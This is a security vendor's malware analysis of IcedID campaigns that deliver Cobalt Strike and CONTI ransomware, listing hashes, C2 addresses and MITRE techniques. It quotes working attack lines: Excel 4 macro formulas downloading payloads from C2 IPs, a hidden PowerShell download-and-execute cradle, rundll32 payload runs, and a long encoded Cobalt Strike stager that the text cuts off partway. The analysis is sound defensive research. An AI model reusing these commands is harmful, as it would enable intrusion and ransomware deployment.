See Cynet’s Autonomous
Breach Protection in Action

Prefer a one-on-one demo? Click here

By clicking next I consent to the use of my personal data by Cynet in accordance with Cynet's Privacy Policy and by its partners

ATTACK TECHNIQUES – HANDS ON

Brought to you by Cynet's CyOps Center

Cynet's 24/7 MDR with the latest security updates and reports

Learn more about CyOps

Network Attacks and Exfiltration

Credential Access & Data Collection

Initial Access and Fileless Attacks

Ransomware Threat Reports

Threat Reports

Vulnerabilities

Evasion techniques

Shelob Moonlight – Spinning a Larger Web

By Max Malyutin – Sr. Threat Researcher

Introduction

Cynet’s research and CyOps groups are constantly working to better understand and discover additional angles threat actors might utilize when trying to compromise our customers. This in turn, translates into ongoing activities and analysis of Trojan Bankers malware variants such as the infamous Emotet, Ursnif (A.K.A Gozi), Trickbot, Dridex, and the threat actors’ tactics, techniques, and procedures (TTPs) of those threats.

The data and findings below were derived directly from Cynet client environments and research labs. Cy If you suspect that your devices may be infected with any of the malware described below, please reach out directly to Cynet for help with evaluation an incident response. Cynet’s MDR team, CyOps, is available 24×7 and ready to help you begin threat hunting.

IcedID overview

IcedID (A.K.A BokBot); IcedID – ID: S0483 was first seen during September 2017 and classified as a banking trojan malware designed to target financial sectors in the U.S and Europe, allowing threat actors to steal financial information, banking credentials, and payment information using web injection and browser hooking techniques.

From 2017 to 2021, the IcedID threat groups use multiple attack techniques and upgraded the range of malicious capabilities to evade detection and deploy massive attack campaigns. The IcedID threat groups remodeled the MO (modus operandi) into a downloader malware to expand its capabilities beyond a banking trojan to enable the distribution of sophisticated threats such as Cobalt Strike Beacons and ransomware such as MAZE, EGREGOR, Sodinokibi, and CONTI.

With this change, IcedID became part of the Malware-as-a-Service (MaaS) – organized cybercrime.

Threat groups associated with IcedID

GOLD CABIN aka: Shakthak, TA551

LUNAR SPIDER aka: GOLD SWATHMORE

The TA551 and LUNAR SPIDER threat groups are classified as eCrime groups with a primary motivation of targeting financial organizations. These eCrime groups are associated with various malware, including IcedID, Qakbot, Ursnif, and Valak. The unique pattern of these groups lies within their kill chain method, weaponized office documents (Excel and Word) which are usually contained in a password-protected zipped file and distributed via malspam campaigns through email and download\drop malware (in most of the cases in the form of DLL payloads).

We suspect that the LUNAR SPIDER and WIZARD SPIDER are related as we observed these groups coordinating the distribution of each other’s malware. For example, we observed a LUNAR SPIDER (IcedID) malspam campaign that drops WIZARD SPIDER malware Trickbot.
Our recent observations suggest that IcedID infection includes CONTI ransomware which is related to the WIZARD SPIDER threat group.

IcedID (BokBot) overview

  • Spear phishing attachment distribution via malspam campaigns (zipped, weaponized Microsoft office documents)
  • User execution via enabling macros
  • DLL download from C2 server
  • Loader DLL execution via rundll32\regsvr32; LOLbins (Living Off the Land Binaries)
  • Fingerprinting and enumeration of the compromised machine
  • C2 server connection, send initial information
  • Initial access for sophisticated threats (downloader activity)

IcedID seems to be one of the most trending malwares, taking the place of the infamous Emotet, “the world’s most dangerous malware.” Emotet was taken down at the end of January 2021 by a major law enforcement operation coordinated between multiple authorities including Europol, the FBI, and the UK’s National Crime Agency, along with agencies from Canada, France, Germany, Lithuania, the Netherlands, and Ukraine.

Once upon a time in Troy – Emotet malware, a trojan evolution:

During the last months, Cynet 360 observed a high number of IcedID infections utilizing Cobalt Strike Beacons and finally attempting to impact the domain with CONTI ransomware.

CONTI Overview

CONTI (MITRE ID: S0575) is a new ransomware observed in the wild and has become a new target for the FBI. On May 20, 2021 the FBI released an article discussing the impact of Conti ransomware on healthcare, law enforcement agencies, and emergency medical services in the US.
The CONTI group operates as Ransomware-as-a-Service (RaaS) affiliated with the “Wizard Spider” threat group. CONTI ransomware was first seen at the end of 2020. We have recently observed CONTI targeting the US and Europe. The NCSC (National Cyber Security Centre) has participated in recent CONTI infection investigations.

Recent news about CONTI:

Cynet to the rescue

Cynet360 autonomous breach protection platform detects and prevents the IcedID kill chain.

Cynet CyOps and Research teams have been recently responded to several incidents at organizations where the Cynet360 platform was not deployed where IcedID infection eventually impacted the compromised domain with CONTI ransomware.

The initial access vector in these cases was a malspam campaign delivering malicious email containing a zipped file, followed by a weaponized office document downloading the IcedID malware. The IcedID malware, in turn, launched a Cobalt Strike beacon on the compromised machine that executed discovery actions on the domain while abusing Windows legitimate binaries.

The next steps of the infection included privilege escalation and lateral movement activities. Once the attackers established persistence on the domain, a CONTI ransomware variant was dropped.

MITRE ATT&CK TTPs Mapping

Tactic

Technique

 

TA0001 – Initial Access

T1566.001: SpearPhishing Attachment

 

TA0002 – Execution

T1204: User Execution

T1059.001: PowerShell

T1059.003: Windows Command Shell

T1559.002: Dynamic Data Exchange

T1106: Native API

T1129: Shared Modules

T1569.002: Service Execution

 
 
 
 
 
 
 

TA0004 – Privilege Escalation

T1055: Process Injection

T1134: Access Token Manipulation

 
 

TA0005 – Defense Evasion

T1140: Deobfuscate/Decode Files or Information

T1562.001: Disable or Modify Tools

T1036: Masquerading

T1112: Modify Registry

T1027: Obfuscated Files or Information

T1055: Process Injection

T1218.011: Rundll32

T1218.005: Mshta

T1218.010: Regsvr32

T1218.007: Msiexec

T1218: Signed Binary Proxy Execution

T1497.001: System Checks

 
 
 

TA0007 – Discovery

T1087: Account Discovery

T1482: Domain Trust Discovery

T1135: Network Share Discovery

T1057: Process Discovery

T1012: Query Registry

T1018: Remote System Discovery

T1518.001: Security Software Discovery

T1082: System Information Discovery

T1016: System Network Configuration Discovery

T1033: System Owner/User Discovery

 

 

 

TA0008 – Lateral Movement

T1570: Lateral Tool Transfer

T1021.002: SMB/Windows Admin Shares

 

TA0011 – Command and Control

T1071.001: Web Protocols

T1132.001: Standard Encoding

T1105: Ingress Tool Transfer

T1571: Non-Standard Port

 

TA0010 – Exfiltration

T1041: Exfiltration Over C2 Channel

 

TA0040 – Impact

T1486: Data Encrypted for Impact

T1490: Inhibit System Recovery

 

Technical analysis

Entry point

The infection chain of IcedID begins through an email vector, by using Spear Phishing emails.

The email is delivered through phishing campaigns containing a Malicious Office Document (weaponized Microsoft Office document) or a password-protected zip file containing the weaponized Microsoft Office document, either MS Word or Excel spreadsheet leading to the execution of multi-stage malicious actions.

Example weaponized Microsoft Office document requesting the user to activate macros:

MD5: e51d7a4db66d3ea986343fe3e221b7fc

SHA-256: f578d6e7fc4d204ef17549be7ea8f3b6bca4b4103e7afff483b180f95f818a20

File type: Office Open XML Document

Magic: Zip archive data, at least v2.0 to extract

Weaponized Word document-

Grandparent Process:
c:\program files (x86)\microsoft office\root\office16\outlook.exe
Parent Process Details:
“C:\Program Files\7-Zip\7zFM.exe” “C:\Users\*\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\82QPK64D\request (002).zip”
Process Details:
“C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE” /n “C:\Users\*\AppData\Local\Temp\7zO77B8.tmp\fatti-03.21.doc” /o “”

Example weaponized Microsoft Office document requesting the user to activate macros:

MD5: d15d140f0d5d88542d059ecd483dee38

SHA-256: db66539408a53e25bf005990c1b868ef140303d2ccfa6964b63b26b6bfc1b07b

File type: Office Open XML Spreadsheet

Magic: Zip archive data, at least v2.0 to extract

Execution

The process tree execution flow:

Network traffic to the C2 servers:

190[.]14[.]38[.]106

193[.]38[.]54[.]246

51[.]89[.]73[.]152

Weaponized Excel document-

Process Details:
“C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE” “C:\Users\*\AppData\Local\Temp\Temp1_Complaint_726368224_04122021.zip\Complaint_726368224_04122021.xlsm”

The weaponized Office documents have a highly obfuscated VBA code and AutoOpen\AutoClose macro for its execution. IcedID Excel spreadsheet documents use Excel 4 Macros formulas.

IcedID Threat actors are utilizing evasion and anti-analysis techniques to evade the malicious content of the Excel 4 Macros formulas and to make the analysis of the malicious document more complex.

The macros color settings were set to white allowing IcedID to hide the macros formulas.

Findings from the malicious sheets:

Both weaponized Microsoft Office documents, Excel and MS Word, lure the user to open the document and enable the macro by click on the “ENABLE EDITING” and “ENABLE CONTENT”.

The ENABLE CONTENT then automatically executes the malicious obfuscated macros.

After the initial access and upon enabling the macros embedded URL downloaded (Excel spreadsheet uses URLDownloadToFile to download) masqueraded DLL files.

Weaponized Microsoft Office document:
MD5: eb1d27c0d19fcaa8b64423e7502baef3

SHA-1: 99afdc744ef8f0a7b2e69aca01a10ca8f1eec26b

SHA-256: baa952bfeae28062d42e78bed942525b68090b4b43ac2ec8a619d0580bd1acca

File type: Office Open XML Spreadsheet

Magic: Zip archive data, at least v2.0 to extract

Language xlm4.0:
=CALL(“uRlMon”, “URLDownloadToFileA”, “JCCB”, 0, “http://188[.]127[.]235[.]69/44300,5396033565[.]dat”, “..\Klos.viters”)

=CALL(“uRlMon”, “URLDownloadToFileA”, “JCCB”, 0, “http://45[.]144[.]30[.]41/44300,5396033565[.]dat”, “..\Klos.viters1”)

=CALL(“uRlMon”, “URLDownloadToFileA”, “JCCB”, 0, “http://62[.]109[.]24[.]36/44300,5396033565[.]dat”, “..\Klos.viters2”)

Defense evasion

These DLL files are executed by rundll32.exe (also, spotted an execution via regsvr32.exe) command line “rundll32 ..[Dll Name].[Random Extension],DllRegisterServer”

regsvr32 execution example:
“C:\Windows\System32\regsvr32.exe” c:\users\public\globalStorage.jpg

Cynet visibility over IcedID campaigns:

rundll32 command execution that detected by Cynet 360:
May 26 2021 rundll32 ..\Hikos.hertolo1,DllRegisterServer

May 26 2021 rundll32 ..\Hikos.hertolo,DllRegisterServer

May 25 2021 rundll32 ..\iroto.tio1,DllRegisterServer

May 25 2021 rundll32 ..\iroto.tio,DllRegisterServer

May 24 2021 rundll32 ..\Hikos.hertolo2,DllRegisterServer

May 24 2021 rundll32 ..\svvhos.dati4,DllRegisterServer

May 20 2021 rundll32 ..\durio.fur,DllRegisterServer

May 17 2021 rundll32 ..\bubl.cmi1,DllRegisterServer

May 17 2021 rundll32 ..\bubl.cmi,DllRegisterServer

May 13 2021 rundll32 ..\lertio.cersw,DllRegisterServer

May 13 2021 rundll32 ..\tuti.rut,DllRegisterServer

May 13 2021 rundll32 ..\tuti.rut1,DllRegisterServe

May 13 2021 rundll32 ..\dtfhdtr.ert,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer5,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer4,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer2,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer3,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer1,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb4,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb1,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb3,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb2,DllRegisterServer

May 11 2021 rundll32 ..\ikjcvesdv.ref,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati3,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati2,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati1,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati,DllRegisterServer

May 20 2021 rundll32 ..\Hikos.hertolo,DllRegisterServer

Apr 28 2021 rundll32 ..\Butyo.vikas,DllRegisterServer

Apr 26 2021 rundll32 ..\jjoputi.vvt1,DllRegisterServer

Apr 26 2021 rundll32 ..\jjoputi.vvt2,DllRegisterServer

Apr 23 2021 rundll32 ..\duron.bnm1,DllRegisterServer

Apr 21 2021 rundll32 ..\ghnrope.ito1,DllRegisterServer

Apr 20 2021 rundll32 ..\Klos.viters1,DllRegisterServer

Apr 20 2021 rundll32 ..\Klos.viters,DllRegisterServer

Apr 20 2021 rundll32 ..\Klos.viters2,DllRegisterServer

Apr 13 2021 rundll32 ..\Hodas.vyur2,DllRegisterServer

Apr 13 2021 rundll32 ..\Hodas.vyur1,DllRegisterServer

Apr 13 2021 rundll32 ..\Hodas.vyur,DllRegisterServer

Apr 6 2021 Rundll32 ..\Kiod.hod1,DllRegisterServer

Apr 6 2021 Rundll32 ..\Kiod.hod2,DllRegisterServer

Apr 6 2021 Rundll32 ..\Kiod.hod,DllRegisterServer

IcedID sample analysis

MD5: 4474dd4c14f76b6b40f855b9aae628fa

SHA-256: 93e5fc51525d584a80db2505638f0f9237bff8d01adc330049a414b45c7a811c

Imphash: 78ed290a779aa51d4473678936319a48

SSDEEP: 768:GGS/PPJ69K2c5r8OsDBZpAYqRHAZorOs1gxuqkB1chYsNbp6SGu4nQvxVH2oOB4:yPRESOn+YC1ZB1chYsNl6SWn+Lc4

File type: Win32 DLL

Magic: PE32+ executable for MS Windows (DLL) (GUI) Mono/.Net assembly

Entropy: 7.302

Exports:

DllRegisterServer

Pluginlnit

By setting breakpoints, we unpacked the IcedID payload via VirtualAlloc API. An allocated memory section was created with zero bytes and the unpacked payload is written in this section.

The below section is responsible for the unpacking routine:

The memory page of the unpacked IcedID have ERW (Execute, Red, Write) protection.

The Dumped IcedID file contains various HTPP APIs. By using IDA we can observe the use of the HTTP APIs in the code.

The IceID loader retrieves information by performing initial enumeration and fingerprints on the compromised host and sends the information to the Command-and-Control Server. The information includes the OS version and physical address sent in encoded cookie.

Example of cookie names and order:
Cookie:

__gads

_gat= OS version

_ga= CPU

_u= Computer name and the username

__io= User SID

_gid= MAC

Hunting tip: external socket with the above data could be an indicator of IcedID activity.

The CPU ID check, stored in the _ga:

The OS version check, stored in the _gat:

The user SID check, stored in _io:

Username and Computer name check stored in _U:

Adapter Info check, stored in the _gid:

The IcedID communicating with the C2 server and sending the enumerated data, found in the memory:

dsedertyhuiokle[.]top à 192[.]42[.]116[.]41
IcedID communicating files – sha256:
0ef2a73bd5e1d545596b1769503461b809793371bbaedb03f852648eafcfef1e

ce0767c640f01062a939183daa3634db74237fceb9f264a0eeeec80097ca5d98

ed08f3f83b79a358b698b477a62aafc902910b179c87126e6afc7267204bd018

902eb3ddc744189404b2465ab8a5a4caa3e2a30b2db5c40570d0b35b8ee4c45b

47c5683cc8cc1c4977af013b5e09b0ec50f610fff820036544c2a5ca5da7686a

6c34b5e0d401f4a9185580e57071995e579a645ead57ae4b280ef8f9a0ff2b30

c21ad5068d4172fd6348578fd493bc717e09d30006862345a2672894aaaa24b7

97341cd0f8c3df8a350be026ce2257c5d99a6df4dd1572b4bbc3ccf996d9e745

b9337eb2ec474402ad98bad94262483c2b5cec3752b11e3d1ed780e78d331d78

b4bd414baa9dea1be8d9b8f690d35aa161e1e533cedbaa6562f2f32e9bc64ae3

Payload execution to Cobalt Strike

After the execution of the first stage loader, the C2 server responds with a fake GZIP payload which is an encrypted payload of the IcedID that was downloaded from a C2 server and executed via rundll32.exe.

The license.dat is the core module of the IcedID.

rundll32.exe “C:\Users\*\AppData\Local\Qiik\cuucuy\Agmupn.dll”,update /i:”BarelyHedgehog\license.dat”

After the execution of the license.dat, the post-infection uses dynamic injection behavior related to a Cobalt Strike beacon allowing threat actor groups to gain full remote control over the compromised machine.

Parent Process Details:
rundll32.exe “C:\Users\*\AppData\Local\Qiik\cuucuy\Agmupn.dll”,update /i:”BarelyHedgehog\license.dat”
Process Details:
C:\Windows\SysWOW64\cmd.exe
Target (injected) Process:
c:\windows\system32\rundll32.exe
The injected data:
MZARUH\x89\xe5H\x81\xec \x00\x00\x00H\x8d\x1d\xea\xff\xff\xffH\x81\xc3\xcc\t\x00\x00\xff\xd3H\x89\xc3I\x89\xf8h\x04\x00\x00\x00Z\xff\xd0A\xb8\xf0\xb5\xa2Vh\x05\x00\x00\x00Z\xff\xd3\x00\xe8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\t\xcd!\xb8\x01L\xcd!This program…
Injection page info:
State=4096, Type=131072, AllocationProtect=64, RegionSize=135168

Dropped payloads by the rundll32 license.dat execution.

c:\users\*\appdata\local\temp\xugi64.exe

File SHA256: 48385CB94B871E3BF46BD1ABFACF1CD69155A0161D2D200ECEBD333A7FF137E8

C:\users\*\appdata\local\temp\ovuleq.exe

File SHA256: 668FCD27F21503184B9E6E10EDB9C9E5C6BA1484EBC60A33A7E6104CA4857561

Additional observations of process injection on different processes related to IcedID infections.

c:\windows\system32\svchost.exe

c:\windows\system32\wuauclt.exe

c:\windows\system32\mstsc.exe

c:\windows\system32\dllhost.exe

The Cobalt Strike infection also observed utilizing a PowerShell execution and performed a fileless shellcode injection.

The initial PowerShell command:
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://23[.]108[.]57[.]148:80/a443’))”

The next stage PowerShell script is stored behind the Cobalt Strike C2 server. The PowerShell script is encoded in a Base64 format.

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADMATwBpAHkAaABiADkASABIADgARgBIADEASwBsAFYAbwB4AEIAVQBXAFAAbQAxAEYAUQBOAEMAQwBnAG8AUgBNAEIAMwBUAGkAcgBGAG8AMQBXADAAZQBRAGkATgBTAHMANwBNAGYAegA4AGIAMQBKAHoATQBtAGUAVABlAHEAYgBvADMAVgBWAGEAYQBaAHIAOQA2ADcAYgBWADMAYgB3AHgARQBiAGcAMABTAHUAVABaAFIAQQBnAGQAUgB0AHgATQBVAHgAVwA3AGcAVQAvAFYAQwA0AFoAbwBQAEoARQBKADkAcABiADQAVgBDADgAdgBFAHQAMABtADIAbgBTADEAZQBWAG8AaQA4AGgARgBGAGcAdgA1AGkATwBFADYARQA0AHAAdgA0AHEAWABBADMATgB5AFAAUwBvADAAdgBYAGUAagBGADYAOAB3AEUAawB3AHEAbABEADUAUQB5AGEASQBuAEMAUgBDADUAYQB1AHIAdwBsAFcAKwBsAGYAaQB4AHUAVQBRAHYAdgBrAG4AYwBQAFgAcgB4AEUARgBrAEgAVABnAHkATwBTAGsAOQBzAEcAUABLAEIAWgA3AHIAKwA4ADUAYwB2AG4AUwBTAEsAawBFADkATwB6ADkAVQB1AEkAbQB3AGMASQA4AC8AQwBMAG8AcABMAFoAZQBvADcATgBWADIAagBDAE4AMAArAFcAaAB0AGsARQArAG8AdgA2AHYAcQBsADIAcwBXAEIAWgBlAEsAegBXAE4AbwB4ADcAVABVAGMAaQBQAFcAZAA3AE4AMABnAHMATQAzAHMAQgBGAFUAagB4AEMANABwAEYAZgAvADgAcwAxAGgAKwB1AHEAMAA5AFYANABWAGQAWQB1AEsANABWAEQAVABTAG0AQwBDAHYANgBtAEIAYwBMAEYATQAvAHkAcABuAEQAVQBSAHEAaQBVAGwARgB4ADcAUwBpAEkAZwB5AFcAcABUAGwAMgBmAHEAVgBmAEgAZQBmAFIAcQBIAHIAeAB5AGkAcgAxAFkAUABwADkAcwBGAFoAcAB3AGoAcwA4AFAAbQBWAGsAOQA2AFoAUwBLAHMAQgB3AEMATgB1AHcASgB3ADIASwBGAGUAcwByADgAUABUADAALwBVADkALwBlAG8AdABFAFQAbgA3AGcAZQBxAGsAbwArAFEAVgBFAFEARwBpAGoAYQB1AHoAYQBLAHEAegAzAFQAZAB6AEQAUwAwAFIATABVAGkAagBHAGsAegAxADgAVgB5AHgAQgBFAGgARQBnAFMAKwBkAFEAbABGAHQARABiAEIAMQB0AFUAdQB2AFkAVABqAEMAdABnADkAKwBsADMANwBUADYAWABWAEgAUwA0AGcAUAB1ADcAUwBxAFgAMwBTAGkAQQAxAEoARgBHADUAYwB1AGIARQA3ADgAQwBoADUATAB3ADUAbQBZAFAAagAvAEIATAA5AE8AMwBLAFYANABlADgAWABnAHAAVQBMAFAAdwBvAGYAVQBOAFYAQgBHAEsAMQBNAGcAbAA0AEkANABQAHUATwBxADQAVwByAHEANgBkADgAaQBlAEEAOABwAFcARQBRAHUANwBuAGUAVgA0AHEAdQBVAEEAbwBFAFkAWgBJAGcAUwByAE4AMABqAHEASQBFAGwAWgAvAC8AeQBjAC8ASgA3AFUAVQB6AHIAbgB4AHEAcQBIAGIAUgBPAHUAdQBjADAAbgBPAEsANAB5AHYAMQBOAEEAbABjADUANwBsAHcAVgBTADYAYwAyAFoAUAB0AHYAMQBpAEoAaQB4ADAAVQBaAGUAOAAvAHIAdwBZAGUATABWADAAZgA4AGEAbAB2AGUAcQA1ADkASQBYAHoAcABvADUAeQBoAEoAVQBZADUASAB0AFcATABtAEEAcAB4AGwAbwByAG4ARgA4AGoAaAB6ACsAZwBVAE0AMABDAGYAZgBsAFUAVABQAEoAZQA4ADYAWABLAG4ANABGAGcAYgA4AGgANQBEAFYARQBDAEoAOABzAC8AQgBuAEgASgBZAEsAawBxACsAZwBqAHoAQQA3AC8AUQBNAE4ATAAxAGUAUQBwAG0AaABpAC8AUwA1AHQATgBLAEwAOQArAHcANQA0ADMASQBIAG0AMwBGAGMAbwBZAFkASgAxAEwAbABkAG8AUQB4AGsAWQB1AFIAVQBLAE4AYQBQADMAZgBNAHIATgBpAEYAQgB2AGkAegArAEUANgA2AFMAWQBPAEwAYQBaAGsAdwB1ADUAcAA3AEwASAAwAEIANgBkAHQAMABKAGYASwBpAFkAeABJAGIAcwBBAGcAdwBqAEkAMABTADIAYQArAEkATQBsAFEAcgBWAGMAeAAzAEUAcABZAGEANwB1AG8AUgBRAC8AQgBDAFQAagBvAGsAeABsAEIAeABZADIAawBOAE8AWQBDAGYARAB3AGkAQQBaAFoAeQBLAG4AOABtADkAKwBsAEsAcwBHAEkAcABJAFgAWQB1AFMAQgBkAE4ANgBGAFIARwB5AHUAbwBPAGUAYwBLAHkAcQBuAG0ANwBsAEMAVAB2AEUALwBoAEgAMgBwAGsAMQBOAFIAWgBGAGgAZABRAEgAbwBYAE4AQgBEAEEAdwBBAEcAcABVAEIATQAzAEkAdABEAFgAaQBwAFYAZgBpAFAAZQAvAGgAZgBkAHoAaQAvAGsAcAB6AEUANgBFAHoAbwBrAHMANQBZAFgANAB4AEsAVQBrAEsANQBkAGMAMABzADQAdQBsADYAOQB2AFcATwBiAEkAUgBRAFIAUQBFADYAUABBADQAOAB3AFkAdABSAHAARwAzAHMAWgBLAFIAYQBhAGQANwBLAFIAVQAyAFcAaQB0AHEAQwB2AHMAeABkADYAdQBKADQAegBnAHQANABjAGYAcwB4AE8ARgB3AFUARABXAFEAMAA0AGYAMgBFAEwAeQBPAE8AegBSADgAbABMAFMAMgBuAHcAagBPAFMAUgBTAE0AdQBKAG8AUgBxAFIAQgA3AG4AWABYAEYAWgBiAFMALwBqAEcAWQAxAHgASwB2AFUAWABOAEMAYQBhAC8AQwBYAG4AeQAvADYAOABXADgAdABPAGYAWgBYAG4AMABYAGkASwAyAFYAKwAzAEMAMgBjADkATABYAHIARQBQAE4AbQBrAG4AaQB2AGQAVQBWAEcANwAxAEoATABHAGIAeQBQAFcAbgBQAGkAYgB2AE8AUQB3AEQAcgBPADIAbgBmAEMAVwBUAFEAYQA3AGQAQwBuAHoAcwA0AEQAUwBUAEkATABUAFEAYgAyAEEAZQBHAHQASgBHADUATwBxAGIAOQB5AFkAMQBCADEANwBxAFQAVgBCADEATQBoAEYAQQAxAGYARwBkAGcAMQBUAFIAUgBWAGwALwByAEEAagBuAFMAVABrACsAbgBIAFMARgBlAE8ASgBPAGQAdwBBAHkAdABmAGcAagBuAGwASgBpAFYAMABmAEwAbAAxAEQAQwA0ADEATgA0AG0AYwA4AGwAVgBOAG4AWgBQAEgAVABqADkAWABiAHYAcAB2AE4AWgBUAFUAVwAwAEEARABrAGMAagBWAGQAYgB6AGwAbgBPADAAWgArAEwAQgBuAHEAbQBEAHQARABkAFgAdQAyAEIAMwBsADAAeABYAGoAWgA1AGkATQBHAEQAYgBjAEkANABIAFoAeAB3AC8AeQBpAE0AeQBaADQAYQBtADEAMABoAFQAdgA5AEcAUgBOAHQASgB4AFkASQBkAGsATQBwAE4AYgBrAFoAbAAyAHcAbwBHAEwATABHADUASgBNAGwAMQA1AHMARgBqAEoARAB3AEkANQB4AFcAYwBZAGUAdQBxAEEAYgBkAHcAYgA4AFgAMgB3ADcAWABjAFUAQgBYAEoAaABOAGsAVQAwAEIAcABsACsANwBJAEsAdABkAHIAVABMAFkAawB4AGIARwA1AHQAUgBEADgAcABZAGQASABRAE4ASwA0AHEAaABOAFgAcwA2AG4AagB3AGEAVwAxAG8AMQBKAHUAeABtAGYAcgBoAGIAeQBNAGgAZgBkADEAWQBoAEwAegBGAE4ARgBNADkAdAByAHMAOQBPADcAYgBtAHMARwBPAGgAbQBSAFUAUQAwAFAARABZADkAMgBwADgAdQBGAEgATQB6ADIAbABoADEAWgBzAEMAbABXADIAYQB4AHAASAAyAHMAZQA2ADEAdwBaADIAMABYAGEAZABUAFQAbwBzAFMAWAAyADgAeQBkAEsAdABVAEoAKwBMAEkAWABMAE0AMABwAE8AagAwAEgASAAvAEoAVQB4ADYATABKAGoAegBsAGwANQBEAGIAQwB1AFgAQgBVAFIAKwBNAEYATwA2AEYARABaAGEAUgB2AGUAVQAxADQAVQBNAGIAQwBQAE8AbABQAFoAVgBZAFQARgBxAFAASgBjAGMAdAAzAHQASQBNADgAYwBMAEcAcgBDAFYAeAAzAFgATABNAGYARgA5AHMAYQBPAHgASwBjAC8AbQBpAHMAZwBWADEAOQBZAFcAQgBsAHkATgBLAGkARABqAEwAMQBzAGIARABRAGUAVQA4AFcAOQBHADEAdAAxAHQAWABVAFoAQwBUAGkALwBvAGgAKwA2AFAARABjAFgAQgBVAE8AeQBzAEMAQgAvAE8AcgAwAGMAVAB4AG0AVgBlAEkAYwBsAEMAbQB2AFMAMwBPAFcAMABXAE8ASABHADgAOAA2AEsAOQBVAGQAMQA5AFMAaAA3AHUAdABkAGIAYgByAHUAVAB3ADYASABxAGMAQgBwAHEAcwBDAE4AKwBVADUAOQBIAFQAbgAxADUAcAA0AC8AcQBFAE4AagB1ACsANgB5AGQAWgBBAFIAMQBnAHIAbwByAEkAeQBhAHEASQB5ADIAYwAwAFYAYwBzACsAQwBEADEAcgB0AEgAVgB1AGQAMQBqAGIAYwBGAFcAZABTAHcAMgBBAGYAZgBtAHMAagBTAG0AbQBnADAAUQBxAG4AVgBHAHEAOABzADMAYgBwAGYAcQBLAEwAbABiAGwAOQBuAE4AUAArAHEAagB6AGwAegA0AHEATgBrAG4AegBpAGoAYQBhAEIAcgB6AFkAbQA3AGEAUwB3AGoAdgByADkAdQBiAHQAdQBHAHMALwBaAHIAdABPADAAMQA5AHMASgBPADkAagBlAE8AYwBWAGQAZgBUAEIAVwBaAFYAbAA3AHYATgArAG8ARwB0AGMAZgBTAHcAbABIADMAVQB4ADYARgBjADIAKwB2AG0AdgBMADIAYwBIAFMAWABkADQATQBkADMAcgBCAGkANgArAEgAKwBwAHEAWQBxAEQAKwBhAFUAVgAyADIAdgBlAFkATgBuAHkAMgA2AGoAUABiAEYAYwBkAFUAQQAzAFQAYwA0AEIAbgBoAHAAVABkAFMAQwA5AEEAcAAvAHAAZQBDAFAAVgBsAFkAMABqAGsAUABzADEAdwAzAGUAQgBoAHcAYwBQACsAQQBJADgAYwBtADkAOAArAGIAQwBMAGcAYQBlAHAAdwBrAHUAcABtAG4ASAAxAFMATQB5AEkAeQA3AGwAYQBXACsASgBkAFIAMwBNAGIAZgBXAHMAegBpAFIAZgAzAEQAUwBYAHAATQArAFQAVgBGAG4AVABBAFkAcQAxAFkAdgBEADQAZgBBADgAYQB6AGIAcQBvACsAOABKAE0ARQBaADkAMQBvAEcAVQBRAHcAWAB4AHkAegBPAC8AcwBQAEMAdgA3AGYAWQBrAEsAOQA5AFIAdgBvAE0AdABEAEEAcwB2ADIAYgBtADMASgAyADcANwArADkAZQBiAG8AKwBQAGwALwBtAHQATABmAG4AVwArAHMASQAxAHAAaABtADEAcgB2AHkATgAzAHYAegBYAGMAZgA2AGIAUABoAFIAegBDAGgAZQBtAHgAZwA2AEcAUQB3AHcAbAArAHQASABEAEMATAB4AFAASQBZAE0AQQB6AGYAVABLAEoAVQArAG4AcAB5ADMASwBQAEkAUgBoAHEAawBTADUAcwA1AEwAMAAyAFkAeABEAHUAeABzAGMAUABwAGsAZwBvAEUAeAA3AGoAUgBjAFAAYwBQAGwATgBJAFkAbABVAC8AOQB3AFYAYQBiAGUAQgBHAEYAYQBPAHAAMwBKAFMAcABiAEwAZgBMAGcANABuAC8AQQB5AFkAMQAwAEUAdgAzAHgAWgB3AFAARQBxADcAMABBAGMASQBIADkARgAxAGgAVwBLAFAAagBJADAAVABXAGYALwBHADMAUwA1ADgAUAB1AHcAZABJAEkAdwBMAGIAMgBaAHEAMgBUAEQAMQBiAHQASQAzAG4AdgBDAHUAYQBmAHkARwBYADAAbwBlAHcALwA5AEgAeABQAHcAawA5AFAALwBEAG0AMABHAFgAagA2AGYAdgBVAEcAWABCAC8AUQB4AFgAdQBWAEMAOABWAHUAaABJAEMAMgBwAGQALwB1AHgAKwB3AHAAZgBIADIAaABIAHQAWABQAHUAeABVAEIAegBjAHIAcwBKAEwAUABoAFUAeQBlAC8AZQAwAHIAVgBaAHAAaQBSAGgAUgBsADIAYgAxAEEALwBxAEYAbwA3AEgAeABrAHcAZAB2AGwAZQBpAFYAWgBKAGQAeABOAFQAcAA4ACsAcwA3AGQAVABEAGQAawArAEoAMwBTAGsAYwAyAGcAdgBIADUAVgBnADQAcwBZAEMAbQBDAGUAUwBvAHoAbgBSAHYASgBoAEcASAB2AGIAMQBQAHUANABUAGYAUABEAFEAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAY